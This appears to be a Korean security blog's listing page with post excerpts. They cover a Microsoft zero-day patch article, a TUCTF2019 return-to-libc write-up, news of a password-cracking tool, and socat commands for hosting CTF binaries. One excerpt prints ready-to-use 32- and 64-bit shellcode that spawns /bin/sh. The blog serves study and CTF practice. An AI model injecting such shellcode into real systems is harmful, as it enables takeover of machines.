[ ★ ]Study195 올해의 마지막 정기 패치 통해 36개 취약점 해결한 MS 12월 정기 패치 발표...이미 공격에 활용되고 있는 제로데이도 포함돼 치명적인 위험도 가진 취약점 7개...대다수가 비주얼 스튜디오와 관련 [보안뉴스 문가용 기자] 2019년의 마지막 ‘패치 튜즈데이’가 왔다. MS는 총 36개의 취약점들을 패치했는데, 이 중에는 실제 공격에 활용되고 있는 윈도우 제로데이 취약점도 포함되어 있다. 문제의 제로데이 취약점은 CVE-2019-1458로 일종의 권한 상승 버그다. Win32k 요소들이 메모리 내 객체들을 제대로 처리하지 못하면서 발동된다. 공격자들은 특수하게 조작된 애플리케이션을 활용해 이 취약점을 익스플로잇 한 후 시스템을 완전히 장악할 수 있게 된다. 사용자의 권한을 가지고 데이터 열람, 변경, 삭제를 진행할 수 있게 된다는 것이다. 이 취약점을 발견해 .. 2019. 12. 11. TUCTF2019 leakalicious writeup Description King Arthur has proposed this challenge for all those who consider themselves worthy. Hint BLUKAT ME! If only we knew what libc to use... Let's pwn 🙂 then, first We can not use shellcode but I get a hint on IDA What... version of libc am I using? I thought we should RTL Then, let's put the pieces for attack If we put A 31 times, e can leak puts function address Next, we need to know .. 2019. 12. 7. 보안 향상 위한 비밀번호 크래킹 도구, 오늘 무료로 풀렸다 블랙햇 유럽에서 발표된 크랙큐...비밀번호 상태 점검 위한 크래킹 도구 파이선으로 만들어져 유연한 확장 가능...클릭 한 번으로 상세 보고서 출력도 [보안뉴스 문가용 기자] 보안 업체 트러스트웨이브(Trustwave)가 새로운 보안 도구를 오픈소스로 공개했다. 보안 연구 팀에서 사용할 만한 패스워드 크래킹 도구이자 플랫폼으로, 이름은 크랙큐(CrackQ)라고 한다. 막 개최한 블랙햇 유럽에서 처음 공개됐다. 크랙큐를 활용해 보안 팀은 주기적으로 자가 해킹 점검을 실시하거나, 레드팀의 훈련 및 모의 해킹 도구로 사용하는 게 가능하다고 한다. “그렇게 하면서 조직 내 비밀번호 설정 문화가 얼마나 건강한지 점검할 수 있습니다.” 크랙큐는 웹 애플리케이션 프레임워크인 플라스크(Flask)를 바탕으로 하고 있으며.. 2019. 12. 6. ShellCode 32-bit Operation 28-BYTE \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80 31-BYTE \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80 64-bit Operation 23-BYTE \x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05 27-BYTE \.. 2019. 12. 5. VI setting (VI 설정) 키패드 숫자 오류 If you input it on your environment env | grep TERM then output is You should change 'xterm' to 'linux or ansi' then do this export TERM=linux export TERM=ansi 2019. 12. 4. CTF remote environment(socat) -one-time- socat tcp-l:[port],reuseaddr,fork EXEC:[file] -infinite- while true; do socat tcp-l:[port],reuseaddr EXEC:[file]; sleep 1; done ex) socat tcp-l:1234,reuseaddr,fok EXEC:./test_file 2019. 12. 4. 이전 1 ··· 3 4 5 6 7 8 9 ··· 33 다음